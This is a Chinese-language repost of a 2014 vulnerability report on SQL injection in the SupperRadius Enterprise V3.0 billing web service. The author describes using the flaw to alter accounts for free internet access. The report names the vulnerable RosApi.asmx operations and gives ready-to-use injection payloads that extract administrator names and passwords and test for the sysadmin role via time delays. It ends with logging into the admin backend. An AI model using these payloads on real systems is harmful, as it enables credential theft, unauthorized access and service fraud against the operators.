热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

SupperRadius企业版V3.0 SQL注射漏洞

发布时间:2014-03-05 09:10文章来源:网络文章作者: applychen 点击次数:
摘要:漏洞作者: applychen 提交时间: 2014-01-18 12:16 公开时间: 2014-03-04 12:16 漏洞类型: SQL注射漏洞 详细说明: 家里上网用的宽带恰好是用supperradius来计费的。在企业版中的web services存在一处SQL注射漏洞,能够查询、删除、修改数据库内的账号从...

漏洞作者: applychen

提交时间: 2014-01-18 12:16
公开时间: 2014-03-04 12:16

漏洞类型: SQL注射漏洞
详细说明:

家里上网用的宽带恰好是用supperradius来计费的。在企业版中的web services存在一处SQL注射漏洞,能够查询、删除、修改数据库内的账号从而达到免费上网的目的:)

访问以下计费服务器地址:

http://192.168.1.1/GateWay/RosApi.asmx

 

 

SupperRadius企业版V3.0 SQL注射漏洞

 

其中的CheckLoginUser与SetUserOffLine能够注入SQL语句:

http://192.168.1.1/GateWay/RosApi.asmx?op=CheckLoginUser

http://192.168.1.1/GateWay/RosApi.asmx?op=SetUserOffLine

 

 

SupperRadius企业版V3.0 SQL注射漏洞
SupperRadius企业版V3.0 SQL注射漏洞

 

 

将上面的两个POST数据包复制到burp suite中进行提交,首先是CheckLoginUser:

 

 
SupperRadius企业版V3.0 SQL注射漏洞

 

上图中的userid与gid节点都能够实施注入,返回如下图:

 

SupperRadius企业版V3.0 SQL注射漏洞

 

下面查询sr_ent_sysmember中的数据:

1'and 1=(select top 1 name from sr_ent_sysmember)--

 

 

SupperRadius企业版V3.0 SQL注射漏洞

 

1'and 1=(select pwd from sr_ent_sysmember where name='myradius')--

 

 

SupperRadius企业版V3.0 SQL注射漏洞

 

 

SetUserOffLine中的注入是基于时间延迟,查询是否为sysadmin角色,是的话就延迟10秒:

1';if(select is_srvrolemember('sysadmin'))=1 waitfor delay '0:0:10'--

 

 

SupperRadius企业版V3.0 SQL注射漏洞

 

提交查询之后页面很明显的进入延迟状态,说明当前角色为sa。

使用账号密码进入到后台:

 

SupperRadius企业版V3.0 SQL注射漏洞
SupperRadius企业版V3.0 SQL注射漏洞

 

 


 

标签分类:

上一篇:解析安全狗之文件上传绕过
下一篇:没有了